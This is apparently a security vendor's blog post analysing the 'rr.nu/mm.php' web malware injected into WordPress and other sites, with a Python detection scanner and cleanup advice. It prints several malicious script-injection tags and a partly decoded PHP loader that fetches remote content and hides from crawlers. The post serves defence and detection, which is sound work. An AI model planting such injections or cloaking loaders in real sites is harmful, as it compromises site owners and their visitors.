How to Deal with the Latest WordPress Outbreak?

    Malicious hackers are finding new ways to compromise legitimate, benign websites with web malware. The goal of this post is to highlight a long-running saga of a specific kind of malware injection, which we’re calling the “rr.nu/mm.php” variety.

    This specific variety of malware has very poor detection rates when anti-virus programs are used to scan web pages; however, it is caught quite successfully by more advanced AI-based systems. StopTheHacker customers can lean back a bit, as they are safe: our systems automatically detected and removed (if you signed up for Automatic Cleanup) this malware.

    This article describes the history of this specific infection, shows code samples, and explains how to find out if your website is infected with the “rr.nu/mm.php” variety of web malware, how to clean it up, and how to protect your site.

    What is this “rr.nu/mm.php” malware?
    The “rr.nu/mm.php” variety of web malware is a family of infections.

    An example:

    <script src="http://irstde24clined.rr.nu/mm.php?d=1"></script>
    

    Many more (not a complete list):

    <script src="http://deunce68rtaint.rr.nu/mm.php?d=1"></script>
    <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script>
    <script src="http://tarian13cheese.rr.nu/mm.php?d=1"></script>
    <script src="http://ive49scor.rr.nu/mm.php?d=1"></script>
    <script src="http://laprot98ocolle.rr.nu/mm.php?d=1"></script>
    

    Indications of infection
    This family of infections has one obvious characteristic: the malicious website that the malware is loaded from ends in “.rr.nu/mm.php?d=1”. Our systems first recorded an infection of this type in 2010, so this is not a new infection.

    This infection is related to the recent news of more than 30,000 WordPress sites being hacked, as reported by Websense. Our estimate of the number of sites affected is much larger: close to 100,000, if you consider the historical impact of this infection.

    This family of infections is not limited to sites having the characteristic “mm.php?d=1” at the very end of the malware-laced URL. There are exceptions.

    An example:

    http://proc30esso.rr.nu/n.php?h=1&s=mm


    Here the code is slightly different. This is where traditional anti-virus fails, since the signature of this piece of malware differs from what is expected.

    Is WordPress, Joomla, or OSCommerce at fault?
    No. While websites powered by WordPress, Joomla, Django, and OSCommerce have all been recorded as infected with this family of web malware, the web malware is injected into websites using many different vectors:

    • Stolen FTP password and username
    • SQL Injection vulnerabilities in forms
    • File inclusion vulnerabilities on servers

    WordPress, Joomla, Django, and OSCommerce are applications that power your website. As a website owner you should always update to the latest version of these applications, as malicious hackers are constantly probing to find vulnerabilities in older versions of these pieces of software. The teams behind the software mentioned above are very diligent at patching, informing users about security issues, and encouraging them to upgrade.

    What does this infection do?
    This family of infections does a couple of things:

    • Injects PHP-based malware into the header and footer of all PHP files on the file system
    • Redirects visitors to fake sites that display fake anti-virus ads

    As an example, when sites are infected with this family of malware, the PHP files (sometimes global.ini.php) on the hosting account are injected with PHP malware that looks like the following.

    <?php /**/ //eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl .. snipped
    

    This base64-encoded code decodes to:

    if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){  $_SERVER['mr_no']=1;
        if(!function_exists('mrobh')){    function get_tds_777($url){$content="";
    $content=@trycurl_777($url);
    if($content!==false)return $content;
    $content=@tryfile_777($url);
    if($content!==false)return $content;
    $content=@tryfopen_777($url);
    if($content!==false)return $content;
    $content=@tryfsockopen_777($url);
    if($content!==false)return $content;
    $content=@trysocket_777($url);
    if($content!==false)return $content;
    return '';
    }  function trycurl_777($url){if(function_exists('curl_init')===false)return false;
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    $result = curl_exec ($ch);
    curl_close($ch);
    if ($result=="")return false;
    return $result;
    }  function tryfile_777($url){if(function_exists('file')===false)return false;
    $inc=@file($url);
    $buf=@implode('',$inc);
    if ($buf=="")return false;
    return $buf;
    }  function tryfopen_777($url){if(function_exists('fopen')===false)return false;
    ... snipped
    

    This code checks whether the web page is being requested by a search-engine web crawler:

    $ua=$_SERVER['HTTP_USER_AGENT'];
    if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;
    if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;
    

    It also checks whether the visitor is running Internet Explorer or is a Mac user; a visitor who is neither is treated the same way as a bot:

    if (is_msie_777($ua))$msie=1;
    $mac=0;
    if (is_mac_777($ua))$mac=1;
    if (($msie==0)&&($mac==0))$bot=1;
    

    These are all significant attempts the malware makes to hide itself by behaving differently depending on who is requesting the page.

    How can I identify this infection on my site?
    Check the HTML files on your website. Often, the web malware is injected near the end of the page.

    An example:

    <script src="http://irstde24clined.rr.nu/mm.php?d=1"></script>
    </body>
    </html>
    

    You can also identify the PHP files on your system that have been changed in the last 24 hours (note that -mtime -1 matches files modified less than one day ago; -mtime -24 would match the last 24 days):

    find . -mtime -1 -iname "*.php"
    
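    The two checks above (look for the injected script tag, then look at recently changed PHP files) can be automated. The following Python script is an added example written for this post, not StopTheHacker's own tooling: it walks a web root, looks in .php/.html/.htm files for a script tag whose src points at any *.rr.nu host (which covers both the mm.php?d=1 form and the n.php?h=1&s=mm variant), decodes any eval(base64_decode("...")) wrapper it finds and checks the decoded text for the markers quoted earlier (mr_no and the *_777 helper names), and can restrict itself to files modified in the last N hours, like the find command. The sample files it writes are constructed for the demonstration, and the base64 payload in them is a harmless stand-in, not the real one.

```python
import base64
import os
import re
import tempfile
import time

# Added example, not StopTheHacker's code. Indicator 1: a <script> tag whose
# src is on any *.rr.nu host (covers mm.php?d=1 and the n.php?h=1&s=mm variant).
RRNU_SCRIPT = re.compile(
    r'<script[^>]+src\s*=\s*["\']https?://[a-z0-9.-]+\.rr\.nu/[^"\']*["\']',
    re.IGNORECASE,
)
# Indicator 2: an eval(base64_decode("...")) wrapper; the blob is captured so
# it can be decoded and inspected for the markers quoted in the post.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']'
)
PAYLOAD_MARKERS = ("mr_no", "_777(", "get_tds_777")
SCAN_EXTENSIONS = (".php", ".html", ".htm")


def decode_b64_blobs(source):
    """Decode every eval(base64_decode(...)) blob in a file's contents."""
    decoded = []
    for blob in EVAL_B64.findall(source):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except ValueError:  # bad padding or stray characters: skip this blob
            continue
    return decoded


def find_indicators(source):
    """Return (indicator, detail) pairs found in one file's contents."""
    hits = []
    for match in RRNU_SCRIPT.finditer(source):
        hits.append(("rr.nu script tag", match.group(0)))
    for payload in decode_b64_blobs(source):
        found = [marker for marker in PAYLOAD_MARKERS if marker in payload]
        if found:
            hits.append(("eval(base64) payload", ", ".join(found)))
    return hits


def scan_tree(root, max_age_hours=None):
    """Walk root and return {path: hits}. max_age_hours limits the scan to
    recently modified files, the same idea as the find -mtime check."""
    cutoff = None if max_age_hours is None else time.time() - max_age_hours * 3600
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            if cutoff is not None and os.path.getmtime(path) < cutoff:
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_indicators(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed samples for a stand-alone run (not real infected files).
SAMPLE_HTML = (
    "<html><body><p>hello</p>\n"
    '<script src="http://irstde24clined.rr.nu/mm.php?d=1"></script>\n'
    "</body></html>\n"
)
SAMPLE_VARIANT = '<script src="http://proc30esso.rr.nu/n.php?h=1&s=mm"></script>'
# Harmless stand-in for the real payload; it only reuses the mr_no marker.
_FAKE_PAYLOAD = "if(!isset($_SERVER['mr_no'])){ /* constructed stand-in */ }"
SAMPLE_PHP = '<?php /**/ eval(base64_decode("%s")); ?>' % (
    base64.b64encode(_FAKE_PAYLOAD.encode()).decode()
)
SAMPLE_CLEAN = "<?php echo 'clean'; ?>"


def demo_scan_tree():
    """Write the samples into a temp dir, scan it, return {name: indicators}."""
    root = tempfile.mkdtemp(prefix="rrnu_demo_")
    files = {"index.html": SAMPLE_HTML, "global.ini.php": SAMPLE_PHP,
             "clean.php": SAMPLE_CLEAN, "notes.txt": SAMPLE_HTML}
    for name, text in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    found = scan_tree(root, max_age_hours=24)
    return {os.path.basename(p): [h[0] for h in hits] for p, hits in found.items()}


if __name__ == "__main__":
    print(demo_scan_tree())
```

    Run scan_tree against a copy of your web root (for example scan_tree("/path/to/site", max_age_hours=24)) and review each hit by hand. A match on the script tag is a strong indicator; the eval(base64_decode()) check only flags blobs whose decoded text contains the quoted markers, so legitimately obfuscated plugins will not trip it unless they use the same strings. Because the decoded payload treats crawlers and non-IE, non-Mac browsers differently from other visitors, inspect the files on disk rather than relying on what one browser shows you.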

    How can I protect my site?
    You can protect your website by:

    • Running the latest version of the CMS, framework, or shopping cart you use
    • Changing your FTP password to something secure and not storing the password on your local computer (better still, use SFTP or SSH)

      Read more best practices.

      Need more help?
      StopTheHacker customers have access to resources and services (like Automatic Cleanup) that protect them against these kind of threats and help them recover from compromises should they occur.

      If you would like more information on how to protect your website, please feel free to contact us. You can also visit our product page to protect your website right now.
